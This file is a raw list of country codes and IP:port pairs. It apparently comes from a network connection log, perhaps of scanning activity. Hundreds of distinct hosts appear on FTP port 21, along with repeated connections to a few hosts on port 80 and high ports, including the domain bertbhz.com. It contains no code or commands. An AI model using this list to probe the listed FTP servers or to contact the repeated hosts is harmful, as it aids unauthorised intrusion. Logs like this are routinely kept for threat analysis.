IN 59.180.29.2:21 tcp
MY 114.133.239.2:21 tcp
IT 78.215.103.2:21 tcp
US 166.135.41.2:21 tcp
CN 120.236.252.2:21 tcp
US 159.189.125.2:21 tcp
US 44.99.6.2:21 tcp
KR 14.80.236.2:21 tcp
US 169.195.37.2:21 tcp
NL 178.84.149.2:21 tcp
EG 154.137.95.2:21 tcp
GB 94.12.147.2:21 tcp
FR 193.242.15.2:21 tcp
US 44.13.169.2:21 tcp
ES 37.158.249.2:21 tcp
US 28.58.44.2:21 tcp
LU 94.252.79.2:21 tcp
IE 34.243.65.2:21 tcp
BR 179.212.23.2:21 tcp
CN 211.80.193.2:21 tcp
CN 110.73.36.2:21 tcp
CA 198.245.63.2:21 tcp
JP 218.227.139.2:21 tcp
NL 145.124.235.2:21 tcp
US 17.53.245.2:21 tcp
ES 178.57.162.2:21 tcp
US 11.63.75.2:21 tcp
US 32.68.223.2:21 tcp
US 12.143.165.2:21 tcp
US 50.10.28.2:21 tcp
US 26.115.187.2:21 tcp
US 192.223.46.2:21 tcp
US 20.83.148.22:80 tcp
SG 43.5.11.2:21 tcp
DE 178.25.205.2:21 tcp
US 162.89.45.2:21 tcp
VN 14.254.53.2:21 tcp
US 29.1.125.2:21 tcp
MU 102.232.152.2:21 tcp
CN 121.39.192.2:21 tcp
JP 220.156.237.2:21 tcp
US 170.234.235.2:21 tcp
AU 3.26.84.2:21 tcp
US 103.144.3.2:21 tcp
CO 190.251.3.2:21 tcp
CN 123.244.204.2:21 tcp
ES 90.169.104.2:21 tcp
US 15.106.215.2:21 tcp
US 108.242.234.2:21 tcp
CL 201.239.238.2:21 tcp
TH 171.7.174.2:21 tcp
GB 195.79.81.2:21 tcp
US 20.83.148.22:80 tcp
DE 53.211.166.2:21 tcp
CN 106.42.31.65:8088 tcp
US 15.91.193.2:21 tcp
EG 154.181.211.2:21 tcp
US 67.79.14.2:21 tcp
EG 105.39.5.2:21 tcp
JP 157.9.171.2:21 tcp
US 104.22.229.2:21 tcp
BR 177.106.95.2:21 tcp
US 135.140.175.2:21 tcp
DE 53.176.3.2:21 tcp
CN 112.73.28.2:21 tcp
US 144.107.249.2:21 tcp
KR 118.61.196.2:21 tcp
CA 198.168.233.2:21 tcp
SE 164.48.209.2:21 tcp
RS 160.99.213.2:21 tcp
CN 1.204.114.2:21 tcp
CN 116.113.222.2:21 tcp
UA 178.151.53.2:21 tcp
US 216.109.142.2:21 tcp
US 108.50.96.2:21 tcp
US 137.150.130.2:21 tcp
JP 130.62.56.2:21 tcp
TW 211.73.216.2:21 tcp
US 55.64.232.2:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
NL 89.105.201.183:2023 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 185.208.158.202:80 bertbhz.com tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 76.29.87.3:21 tcp
IN 42.108.206.3:21 tcp
US 170.144.144.3:21 tcp
US 215.182.119.3:21 tcp
US 74.176.97.3:21 tcp
FR 91.91.193.3:21 tcp
US 22.71.160.3:21 tcp
FR 147.210.236.3:21 tcp
US 4.141.168.3:21 tcp
CA 24.78.237.3:21 tcp
US 21.65.175.3:21 tcp
US 70.220.255.3:21 tcp
BR 177.158.5.3:21 tcp
US 30.190.14.3:21 tcp
US 214.228.161.3:21 tcp
DK 87.55.10.3:21 tcp
CN 61.241.104.3:21 tcp
US 48.67.132.3:21 tcp
US 174.235.179.3:21 tcp
SG 47.129.207.3:21 tcp
US 73.95.55.3:21 tcp
US 199.0.217.3:21 tcp
US 131.62.88.3:21 tcp
NL 154.223.205.3:21 tcp
CO 186.30.240.3:21 tcp
DE 158.181.64.3:21 tcp
US 96.57.142.3:21 tcp
US 214.30.225.3:21 tcp
DE 93.244.1.3:21 tcp
US 71.143.2.3:21 tcp
NL 94.214.19.3:21 tcp
SA 151.255.157.3:21 tcp
US 26.12.180.3:21 tcp
CN 113.104.127.3:21 tcp
US 23.209.155.3:21 tcp
US 157.215.237.3:21 tcp
AE 20.74.158.3:21 tcp
FR 86.195.106.3:21 tcp
DE 83.127.202.3:21 tcp
CA 78.40.66.3:21 tcp
JP 133.106.238.3:21 tcp
CA 142.78.84.3:21 tcp
IT 79.0.94.3:21 tcp
US 12.23.108.3:21 tcp
JP 111.238.1.3:21 tcp
US 76.13.97.3:21 tcp
HK 156.245.40.3:21 tcp
SE 213.101.179.3:21 tcp
US 214.174.251.3:21 tcp
US 205.219.188.3:21 tcp
SE 90.136.207.3:21 tcp
NL 89.105.201.183:2023 tcp
FR 92.134.69.3:21 tcp
CN 113.246.137.3:21 tcp
NL 145.15.203.3:21 tcp
US 208.56.72.3:21 tcp
US 8.95.13.3:21 tcp
CN 103.50.58.3:21 tcp
MX 187.189.57.3:21 tcp
US 63.77.8.3:21 tcp
CN 222.67.239.3:21 tcp
IT 95.235.59.3:21 tcp
GB 213.48.150.3:21 tcp
BR 189.93.40.3:21 tcp
US 206.31.52.3:21 tcp
US 141.126.143.3:21 tcp
US 214.38.123.3:21 tcp
FR 139.124.170.3:21 tcp
ZA 41.57.19.3:21 tcp
N/A 10.119.189.3:21 tcp
BR 177.7.191.3:21 tcp
GB 92.207.170.3:21 tcp
IT 2.236.240.3:21 tcp
NL 145.11.132.3:21 tcp
US 20.83.148.22:80 tcp
HU 31.5.178.3:21 tcp
US 148.52.84.3:21 tcp
US 149.82.196.3:21 tcp
IE 212.147.218.3:21 tcp
FR 163.69.230.3:21 tcp
EE 185.195.23.3:21 tcp
IE 34.252.199.3:21 tcp
SA 93.112.195.3:21 tcp
US 63.68.167.3:21 tcp
CN 124.68.179.3:21 tcp
CN 113.91.8.3:21 tcp
US 171.148.239.3:21 tcp
US 30.42.227.3:21 tcp
CA 199.246.131.3:21 tcp
US 17.215.36.3:21 tcp
US 63.53.77.3:21 tcp
DE 212.114.64.3:21 tcp
CH 57.26.227.3:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 106.42.31.65:8088 tcp
US 172.168.249.4:21 tcp
CN 60.220.185.4:21 tcp
US 15.45.217.4:21 tcp
US 47.87.110.4:21 tcp
US 164.91.193.4:21 tcp
US 107.31.252.4:21 tcp
US 129.130.62.4:21 tcp
DE 91.15.114.4:21 tcp
US 96.96.223.4:21 tcp
US 64.150.7.4:21 tcp
CH 188.154.137.4:21 tcp
KR 175.233.126.4:21 tcp
US 184.24.59.4:21 tcp
US 9.37.240.4:21 tcp
KR 112.178.92.4:21 tcp
NL 145.188.90.4:21 tcp
GB 146.169.175.4:21 tcp
JP 133.179.214.4:21 tcp
DE 5.100.56.4:21 tcp
BR 200.132.232.4:21 tcp
CN 149.41.165.4:21 tcp
CN 39.183.144.4:21 tcp
BR 187.112.93.4:21 tcp
US 9.108.127.4:21 tcp
US 20.83.148.22:80 tcp
US 154.24.171.4:21 tcp
US 20.32.9.4:21 tcp
MP 172.225.241.4:21 tcp
US 32.212.176.4:21 tcp
AT 91.118.105.4:21 tcp
IE 57.212.209.4:21 tcp
US 73.177.120.4:21 tcp
VE 181.181.63.4:21 tcp
PE 191.98.183.4:21 tcp
SE 62.119.46.4:21 tcp
FI 139.97.156.4:21 tcp
US 135.190.193.4:21 tcp
CN 182.175.200.4:21 tcp
NG 102.94.226.4:21 tcp
JP 121.93.189.4:21 tcp
BE 84.192.163.4:21 tcp
RU 185.215.113.117:3333 tcp
US 20.83.148.22:80 tcp
IE 86.44.11.4:21 tcp
GB 92.41.68.4:21 tcp
GB 51.195.213.4:21 tcp
US 209.65.41.4:21 tcp
US 68.202.82.4:21 tcp
US 47.151.63.4:21 tcp
TW 223.200.30.4:21 tcp
US 204.151.124.4:21 tcp
US 50.42.99.4:21 tcp
DE 89.183.22.4:21 tcp
FR 83.193.147.4:21 tcp
US 38.113.152.4:21 tcp
N/A 100.103.32.4:21 tcp
BR 179.55.161.4:21 tcp
N/A 198.18.126.4:21 tcp
US 73.108.46.4:21 tcp
CN 111.18.165.4:21 tcp
CN 162.14.182.4:21 tcp
AU 1.149.232.4:21 tcp
US 20.83.148.22:80 tcp
US 30.189.78.4:21 tcp
SG 47.237.116.4:21 tcp
JP 49.98.245.4:21 tcp
JP 133.241.152.4:21 tcp
IN 3.108.201.4:21 tcp
CN 122.97.177.4:21 tcp
PT 89.152.221.4:21 tcp
DE 46.30.62.4:21 tcp
KR 211.118.85.4:21 tcp
US 130.55.130.4:21 tcp
US 74.244.216.4:21 tcp
US 28.206.4.4:21 tcp
US 72.192.238.4:21 tcp
US 22.47.180.4:21 tcp
EE 37.157.120.4:21 tcp
IR 83.120.23.4:21 tcp
US 172.251.219.4:21 tcp
JP 202.227.27.4:21 tcp
GB 31.69.144.4:21 tcp
US 20.83.148.22:80 tcp
GB 25.103.10.4:21 tcp
US 107.50.12.4:21 tcp
KE 197.182.84.4:21 tcp
US 173.10.116.4:21 tcp
TW 110.28.203.4:21 tcp
US 214.21.87.4:21 tcp
NL 134.143.172.4:21 tcp
NL 149.59.61.4:21 tcp
SA 185.139.121.4:21 tcp
US 35.117.235.4:21 tcp
US 108.61.217.4:21 tcp
US 50.236.249.4:21 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
CN 119.18.194.4:21 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 119.91.25.19:8888 tcp
VN 103.42.55.251:8080 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
US 33.29.175.5:21 tcp
CN 222.69.89.5:21 tcp
US 173.10.82.5:21 tcp
EG 45.111.148.5:21 tcp
MX 177.236.53.5:21 tcp
ES 81.46.170.5:21 tcp
DE 193.133.171.5:21 tcp
N/A 10.13.206.5:21 tcp
GB 176.27.75.5:21 tcp
US 29.138.205.5:21 tcp
US 47.38.191.5:21 tcp
US 141.251.120.5:21 tcp
EG 102.184.255.5:21 tcp
US 48.227.93.5:21 tcp
CN 123.90.14.5:21 tcp
US 23.207.153.5:21 tcp
US 207.80.72.5:21 tcp
US 96.132.154.5:21 tcp
GB 90.192.189.5:21 tcp
VN 123.23.80.5:21 tcp
EG 105.200.188.5:21 tcp
CN 139.155.43.5:21 tcp
US 198.46.227.5:21 tcp
US 71.148.88.5:21 tcp
US 19.48.93.5:21 tcp
CN 115.211.191.5:21 tcp
AU 146.178.96.5:21 tcp
US 74.89.175.5:21 tcp
AU 110.174.245.5:21 tcp
US 155.220.239.5:21 tcp
US 104.32.196.5:21 tcp
US 184.14.135.5:21 tcp
FI 141.172.223.5:21 tcp
CN 106.19.147.5:21 tcp
DE 84.133.121.5:21 tcp
VN 14.252.219.5:21 tcp
DE 63.191.109.5:21 tcp
DE 87.145.242.5:21 tcp
US 134.5.71.5:21 tcp
US 64.211.37.5:21 tcp
UA 109.254.88.5:21 tcp
AU 1.155.63.5:21 tcp
US 19.208.172.5:21 tcp
MX 187.145.253.5:21 tcp
US 30.215.57.5:21 tcp
US 54.112.16.5:21 tcp
US 98.237.180.5:21 tcp
US 24.139.33.5:21 tcp
CL 181.43.233.5:21 tcp
KR 223.194.33.5:21 tcp
US 169.69.190.5:21 tcp
EG 41.131.215.5:21 tcp
US 206.168.33.5:21 tcp
US 32.149.241.5:21 tcp
US 207.238.38.5:21 tcp
JP 221.245.175.5:21 tcp
DE 87.120.210.5:21 tcp
CA 174.5.235.5:21 tcp
VE 201.248.105.5:21 tcp
AU 130.56.124.5:21 tcp
VE 168.194.110.5:21 tcp
AE 208.218.175.5:21 tcp
KE 105.62.247.5:21 tcp
FI 77.72.57.5:21 tcp
CN 36.221.93.5:21 tcp
US 20.83.148.22:80 tcp
PL 193.0.109.5:21 tcp
US 71.84.64.5:21 tcp
US 108.89.11.5:21 tcp
CH 158.232.253.5:21 tcp
AR 200.82.92.5:21 tcp
US 26.50.114.5:21 tcp
BR 200.110.205.5:21 tcp
US 20.131.200.5:21 tcp
US 199.39.213.5:21 tcp
CN 101.17.72.5:21 tcp
IT 95.234.127.5:21 tcp
CN 119.10.42.5:21 tcp
IT 151.50.103.5:21 tcp
CA 138.11.60.5:21 tcp
NL 145.195.163.5:21 tcp
KR 119.208.98.5:21 tcp
US 22.116.102.5:21 tcp
US 158.29.91.5:21 tcp
US 99.13.177.5:21 tcp
US 20.83.148.22:80 tcp
US 74.75.228.5:21 tcp
FR 93.13.166.5:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 106.42.31.65:8088 tcp
US 20.83.148.22:80 tcp
EG 156.169.171.6:21 tcp
DE 86.56.101.6:21 tcp
US 157.121.44.6:21 tcp
US 20.83.148.22:80 tcp
DE 89.60.8.6:21 tcp
US 74.223.95.6:21 tcp
CN 58.206.33.6:21 tcp
US 135.95.123.6:21 tcp
US 72.145.147.6:21 tcp
GB 94.12.3.6:21 tcp
US 33.121.131.6:21 tcp
US 65.85.167.6:21 tcp
JP 126.103.134.6:21 tcp
US 171.71.218.6:21 tcp
JP 40.80.179.6:21 tcp
US 167.174.53.6:21 tcp
US 20.245.236.6:21 tcp
SE 147.180.85.6:21 tcp
BE 62.235.57.6:21 tcp
KZ 46.42.234.6:21 tcp
CN 59.246.67.6:21 tcp
TW 223.22.243.6:21 tcp
US 73.185.177.6:21 tcp
US 20.83.148.22:80 tcp
US 40.6.228.6:21 tcp
CN 223.144.242.6:21 tcp
GB 25.223.1.6:21 tcp
DE 51.225.3.6:21 tcp
JP 218.225.187.6:21 tcp
CN 175.186.61.6:21 tcp
US 160.253.36.6:21 tcp
CN 115.52.178.6:21 tcp
US 75.244.133.6:21 tcp
US 167.107.59.6:21 tcp
JP 153.214.177.6:21 tcp
DE 62.55.176.6:21 tcp
US 69.33.64.6:21 tcp
CN 123.180.11.6:21 tcp
AT 193.186.133.6:21 tcp
US 128.218.221.6:21 tcp
US 20.83.148.22:80 tcp
PK 39.60.195.6:21 tcp
US 21.53.162.6:21 tcp
BR 177.166.232.6:21 tcp
US 20.83.148.22:80 tcp
CN 103.236.20.6:21 tcp
CO 190.24.200.6:21 tcp
US 55.72.146.6:21 tcp
CN 175.43.138.6:21 tcp
MX 187.222.37.6:21 tcp
US 173.95.60.6:21 tcp
US 159.66.212.6:21 tcp
FR 92.183.15.6:21 tcp
DE 37.92.38.6:21 tcp
US 24.33.234.6:21 tcp
ZA 197.83.170.6:21 tcp
US 207.141.72.6:21 tcp
AU 141.243.118.6:21 tcp
US 20.83.148.22:80 tcp
IN 115.111.71.6:21 tcp
IE 193.178.69.6:21 tcp
US 22.178.57.6:21 tcp
IN 196.12.57.6:21 tcp
N/A 100.103.152.6:21 tcp
SG 27.104.233.6:21 tcp
RU 176.208.230.6:21 tcp
US 108.34.127.6:21 tcp
ID 8.215.196.6:21 tcp
US 99.189.88.6:21 tcp
KR 112.221.101.6:21 tcp
US 185.187.247.6:21 tcp
FR 192.93.100.6:21 tcp
US 19.30.113.6:21 tcp
US 24.250.220.6:21 tcp
BG 88.80.145.6:21 tcp
JP 202.245.175.6:21 tcp
CA 96.20.85.6:21 tcp
US 16.192.24.6:21 tcp
US 55.40.181.6:21 tcp
JP 221.30.232.6:21 tcp
NL 213.196.37.6:21 tcp
CN 117.139.102.6:21 tcp
US 72.36.117.6:21 tcp
CO 190.146.4.6:21 tcp
JP 124.240.229.6:21 tcp
DE 53.171.189.6:21 tcp
CN 121.17.126.6:21 tcp
US 8.1.69.6:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.117:3333 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 183.57.21.131:8095 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
JP 60.66.99.7:21 tcp
US 33.208.106.7:21 tcp
CN 124.90.130.7:21 tcp
US 64.222.49.7:21 tcp
TW 203.74.225.7:21 tcp
ES 87.220.49.7:21 tcp
GR 62.1.115.7:21 tcp
RO 95.76.1.7:21 tcp
CN 122.136.179.7:21 tcp
CI 196.180.246.7:21 tcp
CN 175.73.97.7:21 tcp
JP 218.228.236.7:21 tcp
GB 25.57.81.7:21 tcp
BE 178.50.76.7:21 tcp
NL 156.150.167.7:21 tcp
FR 2.4.90.7:21 tcp
KR 119.192.48.7:21 tcp
US 11.226.191.7:21 tcp
US 159.61.166.7:21 tcp
US 99.140.134.7:21 tcp
MD 94.243.83.7:21 tcp
US 107.149.189.7:21 tcp
US 23.23.82.7:21 tcp
ST 197.159.190.7:21 tcp
US 48.123.45.7:21 tcp
JP 14.15.129.7:21 tcp
JP 106.163.172.7:21 tcp
JP 221.49.80.7:21 tcp
PL 188.33.80.7:21 tcp
US 185.178.203.7:21 tcp
US 198.132.177.7:21 tcp
US 216.214.100.7:21 tcp
US 184.130.50.7:21 tcp
US 50.239.106.7:21 tcp
US 20.177.37.7:21 tcp
KR 49.163.24.7:21 tcp
BE 193.245.46.7:21 tcp
CN 36.27.224.7:21 tcp
US 13.103.155.7:21 tcp
US 64.65.252.7:21 tcp
US 204.246.206.7:21 tcp
US 97.129.243.7:21 tcp
ID 36.95.220.7:21 tcp
US 154.6.123.7:21 tcp
CN 14.216.52.7:21 tcp
US 168.246.229.7:21 tcp
US 209.135.226.7:21 tcp
US 21.136.89.7:21 tcp
FR 90.123.15.7:21 tcp
US 30.232.41.7:21 tcp
JP 219.26.96.7:21 tcp
HK 154.80.217.7:21 tcp
US 149.83.36.7:21 tcp
BR 191.227.118.7:21 tcp
N/A 10.149.31.7:21 tcp
US 108.65.221.7:21 tcp
KR 110.11.241.7:21 tcp
IN 49.42.94.7:21 tcp
KR 123.229.237.7:21 tcp
US 150.174.114.7:21 tcp
US 15.83.22.7:21 tcp
TW 223.22.12.7:21 tcp
ES 88.11.17.7:21 tcp
US 214.46.203.7:21 tcp
SE 81.228.52.7:21 tcp
CN 101.130.127.7:21 tcp
CD 102.68.152.7:21 tcp
NO 139.109.207.7:21 tcp
EG 41.37.187.7:21 tcp
FI 37.219.226.7:21 tcp
NO 128.39.177.7:21 tcp
US 136.147.68.7:21 tcp
GB 151.104.39.7:21 tcp
PK 39.54.78.7:21 tcp
ZA 102.32.19.7:21 tcp
AU 130.102.45.7:21 tcp
US 64.221.53.7:21 tcp
US 18.223.135.7:21 tcp
US 16.192.40.7:21 tcp
US 55.50.194.7:21 tcp
MX 148.243.170.7:21 tcp
US 169.19.95.7:21 tcp
JP 219.16.11.7:21 tcp
US 192.236.85.7:21 tcp
IT 37.207.138.7:21 tcp
US 20.83.148.22:80 tcp
US 169.24.98.7:21 tcp
CN 101.19.36.7:21 tcp
JP 219.42.119.7:21 tcp
US 152.86.159.7:21 tcp
PE 181.67.13.7:21 tcp
RU 185.215.113.67:40960 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 61.154.0.139:9000 tcp
NL 89.105.201.183:2023 tcp
US 20.83.148.22:80 tcp
US 185.208.158.202:80 bertbhz.com tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 221.192.3.8:21 tcp
AU 130.194.87.8:21 tcp
US 107.193.154.8:21 tcp
EG 197.122.156.8:21 tcp
US 173.128.34.8:21 tcp
GB 94.118.30.8:21 tcp
BD 103.88.27.8:21 tcp
KR 183.112.217.8:21 tcp
JP 221.244.163.8:21 tcp
RU 62.5.164.8:21 tcp
RU 188.35.35.8:21 tcp
MA 196.71.116.8:21 tcp
GB 25.48.54.8:21 tcp
US 134.14.150.8:21 tcp
US 64.60.57.8:21 tcp
US 73.101.131.8:21 tcp
AR 186.56.139.8:21 tcp
JP 1.112.128.8:21 tcp
BR 179.201.93.8:21 tcp
US 171.153.252.8:21 tcp
DE 80.146.21.8:21 tcp
US 138.34.129.8:21 tcp
US 69.18.25.8:21 tcp
US 20.83.148.22:80 tcp
DE 31.240.18.8:21 tcp
MX 148.237.52.8:21 tcp
IN 122.185.119.8:21 tcp
US 97.186.160.8:21 tcp
TH 114.128.107.8:21 tcp
US 163.246.112.8:21 tcp
US 9.86.151.8:21 tcp
MX 187.238.172.8:21 tcp
SE 193.45.136.8:21 tcp
US 75.193.28.8:21 tcp
CN 119.188.69.8:21 tcp
AU 58.162.208.8:21 tcp
CN 183.250.93.8:21 tcp
US 192.220.19.8:21 tcp
BR 177.106.76.8:21 tcp
JP 13.192.41.8:21 tcp
US 48.240.195.8:21 tcp
CN 42.175.125.8:21 tcp
US 28.58.251.8:21 tcp
KZ 185.99.127.8:21 tcp
US 72.76.43.8:21 tcp
KR 211.185.82.8:21 tcp
US 63.147.203.8:21 tcp
DE 53.128.187.8:21 tcp
US 50.233.77.8:21 tcp
US 184.143.52.8:21 tcp
JP 210.128.204.8:21 tcp
US 192.189.110.8:21 tcp
US 70.226.34.8:21 tcp
US 47.192.67.8:21 tcp
TW 175.98.57.8:21 tcp
AT 46.125.145.8:21 tcp
US 20.83.148.22:80 tcp
JP 126.98.53.8:21 tcp
US 155.170.222.8:21 tcp
SG 43.109.206.8:21 tcp
AE 87.201.156.8:21 tcp
CN 39.90.183.8:21 tcp
CZ 62.40.87.8:21 tcp
IN 119.227.186.8:21 tcp
BR 189.39.74.8:21 tcp
BE 87.64.60.8:21 tcp
CN 43.180.184.8:21 tcp
PR 70.45.232.8:21 tcp
KR 163.152.52.8:21 tcp
JP 150.80.238.8:21 tcp
IE 57.194.5.8:21 tcp
PL 217.96.197.8:21 tcp
CN 218.106.197.8:21 tcp
RU 91.188.176.8:21 tcp
KR 210.112.30.8:21 tcp
JP 153.130.36.8:21 tcp
CN 183.159.240.8:21 tcp
US 135.251.131.8:21 tcp
TW 120.120.11.8:21 tcp
CO 181.250.29.8:21 tcp
JP 163.51.87.8:21 tcp
US 132.8.17.8:21 tcp
US 19.247.21.8:21 tcp
ZA 41.133.43.8:21 tcp
NO 20.251.115.8:21 tcp
US 135.25.2.8:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
CN 39.105.204.209:80 tcp
RU 185.215.113.117:3333 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
JP 202.240.210.9:21 tcp
US 156.117.43.9:21 tcp
CN 120.210.157.9:21 tcp
CN 101.82.14.9:21 tcp
N/A 10.6.38.9:21 tcp
US 164.231.82.9:21 tcp
VE 186.166.233.9:21 tcp
US 107.42.64.9:21 tcp
US 148.36.37.9:21 tcp
JP 219.112.144.9:21 tcp
TW 175.99.187.9:21 tcp
CN 219.159.175.9:21 tcp
US 204.255.168.9:21 tcp
US 23.82.58.9:21 tcp
AU 169.201.139.9:21 tcp
JP 133.34.76.9:21 tcp
CA 74.216.238.9:21 tcp
DE 91.34.203.9:21 tcp
ZA 197.169.132.9:21 tcp
US 216.156.17.9:21 tcp
US 17.229.167.9:21 tcp
US 47.172.3.9:21 tcp
NL 193.149.181.9:21 tcp
JP 133.11.214.9:21 tcp
US 44.244.153.9:21 tcp
US 44.91.56.9:21 tcp
US 164.189.144.9:21 tcp
US 9.202.32.9:21 tcp
KR 222.121.151.9:21 tcp
CN 106.127.207.9:21 tcp
CH 62.204.112.9:21 tcp
US 135.225.146.9:21 tcp
IN 112.196.110.9:21 tcp
US 135.122.159.9:21 tcp
JP 126.14.57.9:21 tcp
TW 220.142.169.9:21 tcp
US 140.60.70.9:21 tcp
CA 142.126.118.9:21 tcp
CN 123.149.80.9:21 tcp
US 98.120.9.9:21 tcp
ID 36.79.132.9:21 tcp
DE 217.240.7.9:21 tcp
US 135.81.211.9:21 tcp
US 24.179.107.9:21 tcp
KG 37.218.191.9:21 tcp
BR 189.70.54.9:21 tcp
US 6.58.0.9:21 tcp
US 164.241.56.9:21 tcp
KR 110.44.255.9:21 tcp
VN 113.180.152.9:21 tcp
RU 92.255.166.9:21 tcp
KR 115.40.61.9:21 tcp
KR 222.101.229.9:21 tcp
US 173.82.128.9:21 tcp
CN 43.250.220.9:21 tcp
CA 216.25.18.9:21 tcp
US 56.204.37.9:21 tcp
CA 142.236.104.9:21 tcp
DE 217.226.136.9:21 tcp
US 146.209.183.9:21 tcp
US 56.248.217.9:21 tcp
US 167.120.198.9:21 tcp
US 20.83.148.22:80 tcp
JP 219.111.35.9:21 tcp
US 56.122.244.9:21 tcp
US 38.151.68.9:21 tcp
US 23.153.202.9:21 tcp
SE 91.95.254.9:21 tcp
US 56.182.17.9:21 tcp
KR 61.78.17.9:21 tcp
AU 162.145.124.9:21 tcp
GB 25.235.212.9:21 tcp
CA 115.167.26.9:21 tcp
US 74.157.1.9:21 tcp
US 132.41.150.9:21 tcp
NL 89.105.201.183:2023 tcp
ZA 165.146.43.9:21 tcp
SG 43.68.183.9:21 tcp
JP 118.67.110.9:21 tcp
US 34.198.95.9:21 tcp
IS 185.247.226.9:21 tcp
GB 213.106.5.9:21 tcp
JP 220.146.161.9:21 tcp
JP 221.100.192.9:21 tcp
US 136.125.245.9:21 tcp
SE 164.135.32.9:21 tcp
US 50.249.76.9:21 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 180.117.160.2:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
NL 178.132.2.10:4000 tcp
US 154.216.18.213:7000 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
US 20.83.148.22:80 tcp
US 173.40.26.10:21 tcp
US 21.165.145.10:21 tcp
IR 5.234.253.10:21 tcp
US 165.223.12.10:21 tcp
EG 102.15.28.10:21 tcp
US 17.15.192.10:21 tcp
US 131.65.163.10:21 tcp
US 71.78.141.10:21 tcp
CN 58.14.161.10:21 tcp
BR 200.164.206.10:21 tcp
CN 222.143.53.10:21 tcp
BR 172.217.37.10:21 tcp
SE 90.235.73.10:21 tcp
JP 211.15.140.10:21 tcp
ES 37.223.122.10:21 tcp
BR 152.250.91.10:21 tcp
US 170.121.16.10:21 tcp
US 12.239.150.10:21 tcp
AU 20.53.141.10:21 tcp
FR 90.26.193.10:21 tcp
JP 167.169.215.10:21 tcp
US 20.83.148.22:80 tcp
DE 51.49.82.10:21 tcp
US 47.208.46.10:21 tcp
JP 133.173.182.10:21 tcp
US 22.155.69.10:21 tcp
US 64.133.242.10:21 tcp
US 19.171.0.10:21 tcp
US 205.143.148.10:21 tcp
US 73.234.245.10:21 tcp
CN 101.72.147.10:21 tcp
JP 118.87.228.10:21 tcp
CN 221.198.138.10:21 tcp
TN 102.168.132.10:21 tcp
US 198.198.244.10:21 tcp
DE 2.200.52.10:21 tcp
US 71.131.63.10:21 tcp
US 199.83.78.10:21 tcp
US 172.82.173.10:21 tcp
US 130.207.36.10:21 tcp
US 159.17.182.10:21 tcp
US 167.214.220.10:21 tcp
